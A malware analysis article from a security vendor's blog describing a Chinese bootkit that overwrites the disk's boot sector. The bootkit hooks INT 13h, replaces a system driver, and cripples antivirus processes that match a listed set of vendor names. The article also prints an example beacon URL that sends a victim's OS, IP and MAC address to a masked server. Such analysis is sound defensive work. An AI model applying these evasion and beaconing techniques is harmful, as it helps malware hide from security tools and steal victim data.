Virus Watch: The Chinese Bootkit

By Vyacheslav ZakorzhevskyWe recently discovered a new bootkit, i.e. a malicious program which infects the hard drive’s boot sector. Kaspersky Lab detects it as Rookit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd. The Trojan infects the computers of users who try to download a video clip from a fake Chinese porn site.

Vyacheslav

We recently discovered a new bootkit, i.e. a malicious program which infects the hard drive’s boot sector. Kaspersky Lab detects it as Rookit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd. The Trojan infects the computers of users who try to download a video clip from a fake Chinese porn site.

This downloader is remarkable in that it downloads other malicious programs using a NSIS engine and stores all links in the relevant NSIS-script.

Fragment of the NSIS script for Trojan-Downloader.NSIS.Agent.jd

The dropper Rootkit.Win32.Fisp.a is among the files downloaded by the Trojan-downloader. This malicious program infects the hard drive’s boot sector. More specifically, it saves the old MBR to the third sector and replaces it with its own. Starting with the fourth sector, it installs an encrypted driver and the remaining code.

Fragment from the start of the hard disk infected by Rootkit.Win32.Fisp.a

The malicious program gains control as soon as the infected computer boots. The first thing it does is to substitute the INT 13h interrupt by modifying the interrupt vector table. Then the bootkit restores the original MBR and resumes the normal boot process.

Once a specific part of the system has been booted, the bootkit intercepts the function ExVerifySuite. The installed hook replaces the system driver fips.sys with the malicious driver which was written to the start of the hard drive in an encrypted format. It should be noted that the driver fips.sys is not required for the operating system to run correctly, so the system won’t crash when it is replaced.

Launched processes are intercepted by the malicious driver using PsSetLoadImageNotifyRoutine. The hook processes the PE header in the loaded image by viewing the ‘Security’ section of the ‘DataDirectory’ array. The driver contains a list of strings (see below) that occur in the processes of popular antivirus programs. If any of these strings occurs in a process, the driver modifies the entry point in the loaded image, so the image can no longer function properly.

Beike
Beijing Rising Information Technology
AVG Technologies
Trend Micro
BITDEFENDER LLC
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
360.cn
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

The driver’s main function is to penetrate the explorer.exe process and inject an alternative version of Rootkit.Win32.Fisp.a which has downloader functionality. The malicious program sends a request to the server in which it communicates information about the victim computer’s operating system, IP address, MAC address etc.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=none&g=none&k=a&h=62&i=2&j=0321-01

Example of the request sent to serverThe malicious program subsequently downloads modifications of Trojan-Dropper.Win32.Vedio.dgs and Trojan-GameThief.Win32.OnLineGames.boas to the victim computer.

The description outlined above can be summarized in the following diagram:

*Vyacheslav Zakorzhevsky is a Senior Malware Analyst in Kaspersky Lab’s heuristic detection group.

Suggested articles